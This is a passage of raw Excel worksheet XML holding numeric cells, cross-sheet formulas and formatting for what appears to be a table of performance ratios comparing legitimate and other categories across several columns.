        <f>'Tabla 3 (Legítimo)'!F45</f>
        <v>78272590</v>
      </c>
      <c r="G11" s="284">
        <f>'Tabla 3 (Legítimo)'!G45</f>
        <v>77450585</v>
      </c>
      <c r="H11" s="284">
        <f>'Tabla 3 (Legítimo)'!H45</f>
        <v>78687808</v>
      </c>
      <c r="I11" s="284">
        <f>'Tabla 3 (Legítimo)'!I45</f>
        <v>78679708</v>
      </c>
      <c r="J11" s="304">
        <f>'Tabla 3 (Legítimo)'!J45</f>
        <v>78511751</v>
      </c>
      <c r="K11" s="434">
        <f>'Tabla 3 (Legítimo)'!K45</f>
        <v>74470192</v>
      </c>
      <c r="L11" s="435">
        <f>'Tabla 3 (Legítimo)'!L45</f>
        <v>61515832</v>
      </c>
      <c r="M11" s="434">
        <f>'Tabla 3 (Legítimo)'!M45</f>
        <v>78694178</v>
      </c>
      <c r="N11" s="435">
        <f>'Tabla 3 (Legítimo)'!N45</f>
        <v>78669512</v>
      </c>
      <c r="O11" s="723"/>
      <c r="P11" s="724"/>
      <c r="S11" s="214"/>
    </row>
    <row r="12" spans="1:19" ht="15" customHeight="1">
      <c r="A12" s="446" t="s">
        <v>4149</v>
      </c>
      <c r="B12" s="440">
        <f>'Tabla 3 (Legítimo)'!B40</f>
        <v>6987</v>
      </c>
      <c r="C12" s="284">
        <f>'Tabla 3 (Legítimo)'!C40</f>
        <v>338711</v>
      </c>
      <c r="D12" s="284">
        <f>'Tabla 3 (Legítimo)'!D40</f>
        <v>345698</v>
      </c>
      <c r="E12" s="586">
        <f>'Tabla 3 (Legítimo)'!E40</f>
        <v>2527690</v>
      </c>
      <c r="F12" s="586">
        <f>'Tabla 3 (Legítimo)'!F40</f>
        <v>673827</v>
      </c>
      <c r="G12" s="586">
        <f>'Tabla 3 (Legítimo)'!G40</f>
        <v>3201517</v>
      </c>
      <c r="H12" s="284">
        <f>'Tabla 3 (Legítimo)'!H40</f>
        <v>6990</v>
      </c>
      <c r="I12" s="284">
        <f>'Tabla 3 (Legítimo)'!I40</f>
        <v>21553</v>
      </c>
      <c r="J12" s="304">
        <f>'Tabla 3 (Legítimo)'!J40</f>
        <v>360274</v>
      </c>
      <c r="K12" s="460">
        <f>'Tabla 3 (Legítimo)'!K40</f>
        <v>4244616</v>
      </c>
      <c r="L12" s="308">
        <f>'Tabla 3 (Legítimo)'!L40</f>
        <v>22445972</v>
      </c>
      <c r="M12" s="460">
        <f>'Tabla 3 (Legítimo)'!M40</f>
        <v>28</v>
      </c>
      <c r="N12" s="308">
        <f>'Tabla 3 (Legítimo)'!N40</f>
        <v>27691</v>
      </c>
      <c r="O12" s="555"/>
      <c r="S12" s="214"/>
    </row>
    <row r="13" spans="1:19" ht="15" customHeight="1" thickBot="1">
      <c r="A13" s="565" t="s">
        <v>4456</v>
      </c>
      <c r="B13" s="441">
        <f>'Tabla 3 (Legítimo)'!B41</f>
        <v>6417</v>
      </c>
      <c r="C13" s="285">
        <f>'Tabla 3 (Legítimo)'!C41</f>
        <v>338311</v>
      </c>
      <c r="D13" s="285">
        <f>'Tabla 3 (Legítimo)'!D41</f>
        <v>344728</v>
      </c>
      <c r="E13" s="592">
        <f>'Tabla 3 (Legítimo)'!E41</f>
        <v>2445673</v>
      </c>
      <c r="F13" s="592">
        <f>'Tabla 3 (Legítimo)'!F41</f>
        <v>571742</v>
      </c>
      <c r="G13" s="592">
        <f>'Tabla 3 (Legítimo)'!G41</f>
        <v>3017415</v>
      </c>
      <c r="H13" s="285">
        <f>'Tabla 3 (Legítimo)'!H41</f>
        <v>6420</v>
      </c>
      <c r="I13" s="285">
        <f>'Tabla 3 (Legítimo)'!I41</f>
        <v>14558</v>
      </c>
      <c r="J13" s="306">
        <f>'Tabla 3 (Legítimo)'!J41</f>
        <v>352879</v>
      </c>
      <c r="K13" s="461">
        <f>'Tabla 3 (Legítimo)'!K41</f>
        <v>4224161</v>
      </c>
      <c r="L13" s="309">
        <f>'Tabla 3 (Legítimo)'!L41</f>
        <v>22211706</v>
      </c>
      <c r="M13" s="461">
        <f>'Tabla 3 (Legítimo)'!M41</f>
        <v>28</v>
      </c>
      <c r="N13" s="309">
        <f>'Tabla 3 (Legítimo)'!N41</f>
        <v>24694</v>
      </c>
      <c r="S13" s="214"/>
    </row>
    <row r="14" spans="1:19" ht="15" customHeight="1" thickTop="1">
      <c r="A14" s="480" t="s">
        <v>638</v>
      </c>
      <c r="B14" s="534">
        <f>B6/'T2 (At) S&lt;=1, FG&gt;=4'!$D$79</f>
        <v>8.1818181818181818E-2</v>
      </c>
      <c r="C14" s="535">
        <f>C6/'T2 (At) S&lt;=1, FG&gt;=4'!$D$79</f>
        <v>0.33636363636363636</v>
      </c>
      <c r="D14" s="535">
        <f>D6/'T2 (At) S&lt;=1, FG&gt;=4'!$D$79</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="E14" s="588">
        <f>E6/'T2 (At) S&lt;=1, FG&gt;=4'!$D$79</f>
        <v>0.69090909090909092</v>
      </c>
      <c r="F14" s="588">
        <f>F6/'T2 (At) S&lt;=1, FG&gt;=4'!$D$79</f>
        <v>0.42727272727272725</v>
      </c>
      <c r="G14" s="588">
        <f>G6/'T2 (At) S&lt;=1, FG&gt;=4'!$D$79</f>
        <v>0.74545454545454548</v>
      </c>
      <c r="H14" s="535">
        <f>H6/'T2 (At) S&lt;=1, FG&gt;=4'!$D$79</f>
        <v>9.0909090909090905E-3</v>
      </c>
      <c r="I14" s="535">
        <f>I6/'T2 (At) S&lt;=1, FG&gt;=4'!$D$79</f>
        <v>0.20909090909090908</v>
      </c>
      <c r="J14" s="538">
        <f>J6/'T2 (At) S&lt;=1, FG&gt;=4'!$D$79</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="K14" s="539">
        <f>K6/'T2 (At) S&lt;=1, FG&gt;=4'!$D$79</f>
        <v>0.41212121212121217</v>
      </c>
      <c r="L14" s="540">
        <f>L6/'T2 (At) S&lt;=1, FG&gt;=4'!$D$79</f>
        <v>0.86666666666666659</v>
      </c>
      <c r="M14" s="539">
        <f>M6/'T2 (At) S&lt;=1, FG&gt;=4'!$D$79</f>
        <v>0.17272727272727273</v>
      </c>
      <c r="N14" s="540">
        <f>N6/'T2 (At) S&lt;=1, FG&gt;=4'!$D$79</f>
        <v>0.5</v>
      </c>
      <c r="O14" s="262"/>
      <c r="S14" s="214"/>
    </row>
    <row r="15" spans="1:19" ht="15" customHeight="1" thickBot="1">
      <c r="A15" s="564" t="s">
        <v>639</v>
      </c>
      <c r="B15" s="593">
        <f t="shared" ref="B15:N15" si="0">B10/$B$4</f>
        <v>8.1263924309751592E-5</v>
      </c>
      <c r="C15" s="589">
        <f t="shared" si="0"/>
        <v>2.1480107442725833E-3</v>
      </c>
      <c r="D15" s="589">
        <f t="shared" si="0"/>
        <v>2.2288807386912322E-3</v>
      </c>
      <c r="E15" s="591">
        <f t="shared" si="0"/>
        <v>1.3569741081065104E-2</v>
      </c>
      <c r="F15" s="591">
        <f t="shared" si="0"/>
        <v>5.3576498376513258E-3</v>
      </c>
      <c r="G15" s="591">
        <f t="shared" si="0"/>
        <v>1.5803209196875306E-2</v>
      </c>
      <c r="H15" s="589">
        <f t="shared" si="0"/>
        <v>8.1302046557277675E-5</v>
      </c>
      <c r="I15" s="589">
        <f t="shared" si="0"/>
        <v>1.8423211487768237E-4</v>
      </c>
      <c r="J15" s="590">
        <f t="shared" si="0"/>
        <v>2.3185315574567205E-3</v>
      </c>
      <c r="K15" s="541">
        <f t="shared" si="0"/>
        <v>5.3676302420536524E-2</v>
      </c>
      <c r="L15" s="542">
        <f t="shared" si="0"/>
        <v>0.21829274190783499</v>
      </c>
      <c r="M15" s="541">
        <f t="shared" si="0"/>
        <v>3.5580764357670755E-7</v>
      </c>
      <c r="N15" s="542">
        <f t="shared" si="0"/>
        <v>3.1379692680297202E-4</v>
      </c>
      <c r="O15" s="262"/>
      <c r="S15" s="214"/>
    </row>
    <row r="16" spans="1:19" ht="15" customHeight="1" thickTop="1" thickBot="1">
      <c r="A16" s="447" t="s">
        <v>640</v>
      </c>
      <c r="B16" s="536">
        <f t="shared" ref="B16:N16" si="1">SQRT(B14*(1-B15))</f>
        <v>0.28602715422079661</v>
      </c>
      <c r="C16" s="537">
        <f t="shared" si="1"/>
        <v>0.57934542689033519</v>
      </c>
      <c r="D16" s="537">
        <f t="shared" si="1"/>
        <v>0.6172253677766697</v>
      </c>
      <c r="E16" s="537">
        <f t="shared" si="1"/>
        <v>0.82555050326124835</v>
      </c>
      <c r="F16" s="537">
        <f t="shared" si="1"/>
        <v>0.65190762352868803</v>
      </c>
      <c r="G16" s="537">
        <f t="shared" si="1"/>
        <v>0.85654770522485535</v>
      </c>
      <c r="H16" s="537">
        <f t="shared" si="1"/>
        <v>9.5342382922784838E-2</v>
      </c>
      <c r="I16" s="537">
        <f t="shared" si="1"/>
        <v>0.45722247082850764</v>
      </c>
      <c r="J16" s="543">
        <f t="shared" si="1"/>
        <v>0.67341783208108796</v>
      </c>
      <c r="K16" s="544">
        <f t="shared" si="1"/>
        <v>0.62449985532862684</v>
      </c>
      <c r="L16" s="545">
        <f t="shared" si="1"/>
        <v>0.82309150383166774</v>
      </c>
      <c r="M16" s="544">
        <f t="shared" si="1"/>
        <v>0.41560463335914438</v>
      </c>
      <c r="N16" s="545">
        <f t="shared" si="1"/>
        <v>0.70699582851428378</v>
      </c>
      <c r="S16" s="214"/>
    </row>
    <row r="17" spans="1:17" ht="15" customHeight="1" thickTop="1">
      <c r="A17" s="525" t="s">
        <v>4915</v>
      </c>
      <c r="B17" s="594">
        <f t="shared" ref="B17:N17" si="2">B12/B8</f>
        <v>19.30110497237569</v>
      </c>
      <c r="C17" s="595">
        <f t="shared" si="2"/>
        <v>46.802680668785406</v>
      </c>
      <c r="D17" s="595">
        <f t="shared" si="2"/>
        <v>45.492564811159362</v>
      </c>
      <c r="E17" s="595">
        <f t="shared" si="2"/>
        <v>2.6785627239915479</v>
      </c>
      <c r="F17" s="595">
        <f t="shared" si="2"/>
        <v>31.374353960050286</v>
      </c>
      <c r="G17" s="595">
        <f t="shared" si="2"/>
        <v>3.3173523078867908</v>
      </c>
      <c r="H17" s="595">
        <f t="shared" si="2"/>
        <v>436.875</v>
      </c>
      <c r="I17" s="595">
        <f t="shared" si="2"/>
        <v>7.7780584626488629</v>
      </c>
      <c r="J17" s="596">
        <f t="shared" si="2"/>
        <v>34.795634537376856</v>
      </c>
      <c r="K17" s="526">
        <f t="shared" si="2"/>
        <v>9308.3684210526317</v>
      </c>
      <c r="L17" s="527">
        <f t="shared" si="2"/>
        <v>63.367498637848335</v>
      </c>
      <c r="M17" s="526">
        <f t="shared" si="2"/>
        <v>1.4162156694147994E-3</v>
      </c>
      <c r="N17" s="527">
        <f t="shared" si="2"/>
        <v>6.9349885209924215E-3</v>
      </c>
    </row>
    <row r="18" spans="1:17" ht="15" customHeight="1" thickBot="1">
      <c r="A18" s="566" t="s">
        <v>4916</v>
      </c>
      <c r="B18" s="528">
        <f t="shared" ref="B18:N18" si="3">B13/B9</f>
        <v>77.313253012048193</v>
      </c>
      <c r="C18" s="597">
        <f t="shared" si="3"/>
        <v>276.62387571545378</v>
      </c>
      <c r="D18" s="597">
        <f t="shared" si="3"/>
        <v>263.95712098009187</v>
      </c>
      <c r="E18" s="597">
        <f t="shared" si="3"/>
        <v>12.202130419597864</v>
      </c>
      <c r="F18" s="597">
        <f t="shared" si="3"/>
        <v>172.78392263523722</v>
      </c>
      <c r="G18" s="597">
        <f t="shared" si="3"/>
        <v>14.815070309124474</v>
      </c>
      <c r="H18" s="597">
        <f t="shared" si="3"/>
        <v>3210</v>
      </c>
      <c r="I18" s="597">
        <f t="shared" si="3"/>
        <v>8.5534665099882492</v>
      </c>
      <c r="J18" s="529">
        <f t="shared" si="3"/>
        <v>117.3915502328676</v>
      </c>
      <c r="K18" s="528">
        <f t="shared" si="3"/>
        <v>12243.944927536231</v>
      </c>
      <c r="L18" s="529">
        <f t="shared" si="3"/>
        <v>64.724892254881681</v>
      </c>
      <c r="M18" s="528">
        <f t="shared" si="3"/>
        <v>1.4169323414806943E-3</v>
      </c>
      <c r="N18" s="529">
        <f t="shared" si="3"/>
        <v>9.9249978195872206E-3</v>
      </c>
    </row>
    <row r="19" spans="1:17" ht="26.45" customHeight="1" thickTop="1">
      <c r="A19" s="24"/>
      <c r="B19" s="573"/>
      <c r="C19" s="24"/>
      <c r="D19" s="24"/>
      <c r="E19" s="23" t="s">
        <v>669</v>
      </c>
      <c r="F19" s="24"/>
      <c r="G19" s="24"/>
      <c r="H19" s="24"/>
      <c r="I19" s="24"/>
      <c r="J19" s="574"/>
      <c r="K19" s="722"/>
      <c r="L19" s="722"/>
      <c r="M19" s="722"/>
      <c r="N19" s="722"/>
      <c r="O19" s="722"/>
      <c r="P19" s="722"/>
      <c r="Q19" s="722"/>
    </row>
    <row r="20" spans="1:17">
      <c r="A20" s="24"/>
      <c r="B20" s="24"/>
      <c r="C20" s="24"/>
      <c r="D20" s="24"/>
      <c r="E20" s="24"/>
      <c r="F20" s="24"/>
      <c r="G20" s="24"/>
      <c r="H20" s="24"/>
      <c r="I20" s="24"/>
      <c r="J20" s="575" t="s">
        <v>657</v>
      </c>
    </row>
    <row r="21" spans="1:17" ht="23.25" customHeight="1">
      <c r="A21" s="716" t="s">
        <v>670</v>
      </c>
      <c r="B21" s="716"/>
      <c r="C21" s="716"/>
      <c r="D21" s="716"/>
      <c r="E21" s="23" t="s">
        <v>648</v>
      </c>
      <c r="F21" s="24"/>
      <c r="G21" s="24"/>
      <c r="H21" s="23" t="s">
        <v>649</v>
      </c>
      <c r="I21" s="24"/>
      <c r="J21" s="25" t="s">
        <v>654</v>
      </c>
      <c r="K21" s="23" t="s">
        <v>642</v>
      </c>
      <c r="L21" s="23"/>
      <c r="M21" s="23"/>
    </row>
    <row r="22" spans="1:17" ht="25.5" customHeight="1">
      <c r="A22" s="23" t="s">
        <v>671</v>
      </c>
      <c r="B22" s="24"/>
      <c r="C22" s="24"/>
      <c r="D22" s="24"/>
      <c r="E22" s="23" t="s">
        <v>659</v>
      </c>
      <c r="F22" s="24"/>
      <c r="G22" s="24"/>
      <c r="H22" s="23" t="s">
        <v>660</v>
      </c>
      <c r="I22" s="24"/>
      <c r="J22" s="25" t="s">
        <v>655</v>
      </c>
      <c r="K22" s="23" t="s">
        <v>647</v>
      </c>
      <c r="L22" s="23"/>
      <c r="M22" s="23"/>
    </row>
    <row r="23" spans="1:17">
      <c r="A23" s="715" t="s">
        <v>672</v>
      </c>
      <c r="B23" s="715"/>
      <c r="C23" s="715"/>
      <c r="D23" s="715"/>
      <c r="E23" s="23" t="s">
        <v>650</v>
      </c>
      <c r="F23" s="24"/>
      <c r="G23" s="24"/>
      <c r="H23" s="23" t="s">
        <v>651</v>
      </c>
      <c r="I23" s="24"/>
      <c r="J23" s="25" t="s">
        <v>656</v>
      </c>
      <c r="K23" s="23" t="s">
        <v>643</v>
      </c>
      <c r="L23" s="23"/>
      <c r="M23" s="23"/>
    </row>
    <row r="24" spans="1:17">
      <c r="A24" s="24"/>
      <c r="B24" s="24"/>
      <c r="C24" s="24"/>
      <c r="D24" s="24"/>
      <c r="E24" s="24"/>
      <c r="F24" s="24"/>
      <c r="G24" s="24"/>
      <c r="H24" s="24"/>
      <c r="I24" s="24"/>
      <c r="J24" s="25"/>
      <c r="K24" s="24"/>
      <c r="L24" s="24"/>
      <c r="M24" s="24"/>
    </row>
    <row r="25" spans="1:17">
      <c r="A25" s="23" t="s">
        <v>661</v>
      </c>
      <c r="B25" s="24"/>
      <c r="C25" s="24"/>
      <c r="D25" s="24"/>
      <c r="E25" s="24"/>
      <c r="F25" s="24"/>
      <c r="G25" s="24"/>
      <c r="H25" s="24"/>
      <c r="I25" s="24"/>
      <c r="J25" s="25"/>
      <c r="K25" s="24"/>
      <c r="L25" s="24"/>
      <c r="M25" s="24"/>
    </row>
    <row r="26" spans="1:17">
      <c r="A26" s="23" t="s">
        <v>662</v>
      </c>
      <c r="B26" s="24"/>
      <c r="C26" s="24"/>
      <c r="D26" s="24"/>
      <c r="E26" s="23" t="s">
        <v>652</v>
      </c>
      <c r="F26" s="24"/>
      <c r="G26" s="24"/>
      <c r="H26" s="23" t="s">
        <v>653</v>
      </c>
      <c r="I26" s="24"/>
      <c r="J26" s="25" t="s">
        <v>656</v>
      </c>
      <c r="K26" s="23" t="s">
        <v>644</v>
      </c>
      <c r="L26" s="23"/>
      <c r="M26" s="23"/>
    </row>
    <row r="27" spans="1:17">
      <c r="A27" s="24" t="s">
        <v>645</v>
      </c>
      <c r="B27" s="24"/>
      <c r="C27" s="24"/>
      <c r="D27" s="24"/>
      <c r="E27" s="23" t="s">
        <v>640</v>
      </c>
      <c r="F27" s="24"/>
      <c r="G27" s="24"/>
      <c r="H27" s="23" t="s">
        <v>666</v>
      </c>
      <c r="I27" s="24"/>
      <c r="J27" s="25" t="s">
        <v>656</v>
      </c>
      <c r="K27" s="23" t="s">
        <v>646</v>
      </c>
      <c r="L27" s="23"/>
      <c r="M27" s="23"/>
    </row>
    <row r="29" spans="1:17">
      <c r="H29" s="23"/>
    </row>
    <row r="30" spans="1:17">
      <c r="A30" s="23" t="s">
        <v>663</v>
      </c>
      <c r="E30" s="262" t="s">
        <v>664</v>
      </c>
      <c r="H30" s="23" t="s">
        <v>665</v>
      </c>
      <c r="J30" s="25" t="s">
        <v>655</v>
      </c>
      <c r="K30" s="262" t="s">
        <v>2321</v>
      </c>
      <c r="L30" s="262"/>
      <c r="M30" s="262"/>
    </row>
    <row r="32" spans="1:17">
      <c r="A32" s="262" t="s">
        <v>4917</v>
      </c>
      <c r="E32" s="262" t="s">
        <v>4918</v>
      </c>
      <c r="H32" s="23" t="s">
        <v>2248</v>
      </c>
      <c r="J32" s="25" t="s">
        <v>656</v>
      </c>
      <c r="K32" s="572" t="s">
        <v>2247</v>
      </c>
      <c r="L32" s="572"/>
      <c r="M32" s="572"/>
    </row>
    <row r="33" spans="1:3" ht="29.25" customHeight="1"/>
    <row r="34" spans="1:3">
      <c r="A34" s="576" t="s">
        <v>673</v>
      </c>
      <c r="B34" s="577">
        <v>1</v>
      </c>
      <c r="C34" s="262" t="s">
        <v>2322</v>
      </c>
    </row>
    <row r="36" spans="1:3">
      <c r="A36" s="578"/>
    </row>
  </sheetData>
  <mergeCells count="12">
    <mergeCell ref="B1:J1"/>
    <mergeCell ref="K1:L1"/>
    <mergeCell ref="M1:N1"/>
    <mergeCell ref="B3:N3"/>
    <mergeCell ref="B4:N4"/>
    <mergeCell ref="K19:Q19"/>
    <mergeCell ref="A21:D21"/>
    <mergeCell ref="A23:D23"/>
    <mergeCell ref="O5:P5"/>
    <mergeCell ref="O6:P7"/>
    <mergeCell ref="O10:P11"/>
    <mergeCell ref="B5:N5"/>
  </mergeCells>
  <conditionalFormatting sqref="E6:G6">
    <cfRule type="expression" dxfId="220" priority="25">
      <formula>IF(E6&lt;B6,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E7:G7">
    <cfRule type="expression" dxfId="219" priority="20">
      <formula>IF(E7&gt;B7,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E8:G10">
    <cfRule type="expression" dxfId="218" priority="6">
      <formula>IF(E8&lt;B8,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E11:G11">
    <cfRule type="expression" dxfId="217" priority="17">
      <formula>IF(E11&gt;B11,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E12:G15">
    <cfRule type="expression" dxfId="216" priority="1">
      <formula>IF(E12&lt;B12,1,0)</formula>
    </cfRule>
  </conditionalFormatting>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1">
    <tabColor rgb="FFFF3F68"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:S56"/>
  <sheetViews>
    <sheetView zoomScale="85" zoomScaleNormal="85" workbookViewId="0">
      <pane xSplit="1" ySplit="3" topLeftCell="E14" activePane="bottomRight" state="frozen"/>
      <selection activeCell="Q6" sqref="Q6"/>
      <selection pane="topRight" activeCell="Q6" sqref="Q6"/>
      <selection pane="bottomLeft" activeCell="Q6" sqref="Q6"/>
      <selection pane="bottomRight" activeCell="K55" sqref="K55:N55"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11.42578125" defaultRowHeight="12.75"/>
  <cols>
    <col min="1" max="1" width="33.140625" style="26" customWidth="1"/>
    <col min="2" max="2" width="20.140625" style="214" customWidth="1"/>
    <col min="3" max="3" width="21.140625" style="214" customWidth="1"/>
    <col min="4" max="4" width="20.42578125" style="214" customWidth="1"/>
    <col min="5" max="5" width="19.42578125" style="214" customWidth="1"/>
    <col min="6" max="6" width="15.5703125" style="214" customWidth="1"/>
    <col min="7" max="7" width="11" style="214" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="11.42578125" style="214" customWidth="1"/>
    <col min="9" max="9" width="16.7109375" style="214" customWidth="1"/>
    <col min="10" max="10" width="11.85546875" style="214" customWidth="1"/>
    <col min="11" max="11" width="15.85546875" style="214" customWidth="1"/>
    <col min="12" max="12" width="21.42578125" style="214" customWidth="1"/>
    <col min="13" max="13" width="15.140625" style="214" customWidth="1"/>
    <col min="14" max="14" width="29.28515625" style="214" customWidth="1"/>
    <col min="15" max="16384" width="11.42578125" style="26"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:19" ht="19.5">
      <c r="A1" s="569" t="s">
        <v>2352</v>
      </c>
      <c r="B1" s="570"/>
      <c r="C1" s="570"/>
      <c r="D1" s="570"/>
    </row>
    <row r="2" spans="1:19" ht="12.75" customHeight="1">
      <c r="A2" s="571"/>
      <c r="B2" s="713" t="s">
        <v>2474</v>
      </c>
      <c r="C2" s="714"/>
      <c r="D2" s="714"/>
      <c r="E2" s="714"/>
      <c r="F2" s="714"/>
      <c r="G2" s="714"/>
      <c r="H2" s="714"/>
      <c r="I2" s="714"/>
      <c r="J2" s="714"/>
      <c r="K2" s="701" t="s">
        <v>680</v>
      </c>
      <c r="L2" s="702"/>
      <c r="M2" s="703" t="s">
        <v>681</v>
      </c>
      <c r="N2" s="704"/>
    </row>
    <row r="3" spans="1:19" ht="28.5" customHeight="1" thickBot="1">
      <c r="A3" s="21" t="s">
        <v>641</v>
      </c>
      <c r="B3" s="21" t="s">
        <v>0</v>
      </c>
      <c r="C3" s="21" t="s">
        <v>1</v>
      </c>
      <c r="D3" s="21" t="s">
        <v>2</v>
      </c>
      <c r="E3" s="21" t="s">
        <v>3</v>
      </c>
      <c r="F3" s="21" t="s">
        <v>1758</v>
      </c>
      <c r="G3" s="21" t="s">
        <v>1759</v>
      </c>
      <c r="H3" s="21" t="s">
        <v>1760</v>
      </c>
      <c r="I3" s="21" t="s">
        <v>1761</v>
      </c>
      <c r="J3" s="310" t="s">
        <v>1762</v>
      </c>
      <c r="K3" s="416" t="s">
        <v>2349</v>
      </c>
      <c r="L3" s="417" t="s">
        <v>2468</v>
      </c>
      <c r="M3" s="419" t="s">
        <v>2349</v>
      </c>
      <c r="N3" s="420" t="s">
        <v>2475</v>
      </c>
      <c r="S3" s="214"/>
    </row>
    <row r="4" spans="1:19" ht="12.75" customHeight="1" thickTop="1" thickBot="1">
      <c r="A4" s="727" t="s">
        <v>4146</v>
      </c>
      <c r="B4" s="728"/>
      <c r="C4" s="728"/>
      <c r="D4" s="728"/>
      <c r="E4" s="728"/>
      <c r="F4" s="728"/>
      <c r="G4" s="728"/>
      <c r="H4" s="728"/>
      <c r="I4" s="728"/>
      <c r="J4" s="728"/>
      <c r="K4" s="728"/>
      <c r="L4" s="728"/>
      <c r="M4" s="728"/>
      <c r="N4" s="729"/>
      <c r="S4" s="214"/>
    </row>
    <row r="5" spans="1:19">
      <c r="A5" s="259" t="s">
        <v>640</v>
      </c>
      <c r="B5" s="557">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!B16</f>
        <v>0.28602715422079661</v>
      </c>
      <c r="C5" s="557">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!C16</f>
        <v>0.57934542689033519</v>
      </c>
      <c r="D5" s="557">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!D16</f>
        <v>0.6172253677766697</v>
      </c>
      <c r="E5" s="557">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!E16</f>
        <v>0.82555050326124835</v>
      </c>
      <c r="F5" s="557">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!F16</f>
        <v>0.65190762352868803</v>
      </c>
      <c r="G5" s="557">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!G16</f>
        <v>0.85654770522485535</v>
      </c>
      <c r="H5" s="557">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!H16</f>
        <v>9.5342382922784838E-2</v>
      </c>
      <c r="I5" s="557">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!I16</f>
        <v>0.45722247082850764</v>
      </c>
      <c r="J5" s="558">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!J16</f>
        <v>0.67341783208108796</v>
      </c>
      <c r="K5" s="559">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!K16</f>
        <v>0.62449985532862684</v>
      </c>
      <c r="L5" s="560">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!L16</f>
        <v>0.82309150383166774</v>
      </c>
      <c r="M5" s="561">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!M16</f>
        <v>0.41560463335914438</v>
      </c>
      <c r="N5" s="560">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!N16</f>
        <v>0.70699582851428378</v>
      </c>
      <c r="S5" s="214"/>
    </row>
    <row r="6" spans="1:19">
      <c r="A6" s="366" t="s">
        <v>4147</v>
      </c>
      <c r="B6" s="364">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!$K$79</f>
        <v>8.1818181818181818E-2</v>
      </c>
      <c r="C6" s="364">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!$Q$79</f>
        <v>0.33636363636363636</v>
      </c>
      <c r="D6" s="364">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!$W$79</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="E6" s="364">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!$AC$79</f>
        <v>0.69090909090909092</v>
      </c>
      <c r="F6" s="364">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!$AI$79</f>
        <v>0.42727272727272725</v>
      </c>
      <c r="G6" s="364">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!$AO$79</f>
        <v>0.74545454545454548</v>
      </c>
      <c r="H6" s="364">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!$AU$79</f>
        <v>9.0909090909090905E-3</v>
      </c>
      <c r="I6" s="364">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!$BA$79</f>
        <v>0.20909090909090908</v>
      </c>
      <c r="J6" s="365">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!$BG$79</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="K6" s="455">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!$BM$79</f>
        <v>0.41212121212121217</v>
      </c>
      <c r="L6" s="456">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!$BT$79</f>
        <v>0.86666666666666659</v>
      </c>
      <c r="M6" s="450">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!$BZ$79</f>
        <v>0.17272727272727273</v>
      </c>
      <c r="N6" s="456">
        <f>'T2 (At) S&lt;=1, FG&gt;=4'!$CG$79</f>
        <v>0.5</v>
      </c>
      <c r="O6" s="572"/>
      <c r="P6" s="572"/>
      <c r="Q6" s="572"/>
      <c r="S6" s="214"/>
    </row>
    <row r="7" spans="1:19">
      <c r="A7" s="369" t="s">
        <v>4457</v>
      </c>
      <c r="B7" s="281">
        <f t="shared" ref="B7:N7" si="0">SUM(B8,B9)</f>
        <v>6500</v>
      </c>
      <c r="C7" s="281">
        <f t="shared" si="0"/>
        <v>339534</v>
      </c>
      <c r="D7" s="281">
        <f t="shared" si="0"/>
        <v>346034</v>
      </c>
      <c r="E7" s="281">
        <f t="shared" si="0"/>
        <v>2646103</v>
      </c>
      <c r="F7" s="281">
        <f t="shared" si="0"/>
        <v>575051</v>
      </c>
      <c r="G7" s="281">
        <f t="shared" si="0"/>
        <v>3221087</v>
      </c>
      <c r="H7" s="281">
        <f t="shared" si="0"/>
        <v>6422</v>
      </c>
      <c r="I7" s="281">
        <f t="shared" si="0"/>
        <v>16260</v>
      </c>
      <c r="J7" s="311">
        <f t="shared" si="0"/>
        <v>355885</v>
      </c>
      <c r="K7" s="451">
        <f t="shared" si="0"/>
        <v>4224506</v>
      </c>
      <c r="L7" s="454">
        <f t="shared" si="0"/>
        <v>22554877</v>
      </c>
      <c r="M7" s="451">
        <f t="shared" si="0"/>
        <v>19789</v>
      </c>
      <c r="N7" s="454">
        <f t="shared" si="0"/>
        <v>2512755</v>
      </c>
      <c r="O7" s="572"/>
      <c r="P7" s="572"/>
      <c r="Q7" s="572"/>
      <c r="S7" s="214"/>
    </row>
    <row r="8" spans="1:19" ht="16.5" customHeight="1">
      <c r="A8" s="369" t="s">
        <v>4455</v>
      </c>
      <c r="B8" s="281">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!B9</f>
        <v>83</v>
      </c>
      <c r="C8" s="281">
        <f>'T4 (Rend) S&lt;=1, FG&gt;=4'!C9</f>
        <v>1223</v>
      </c>
      <c r="D8" s="281">
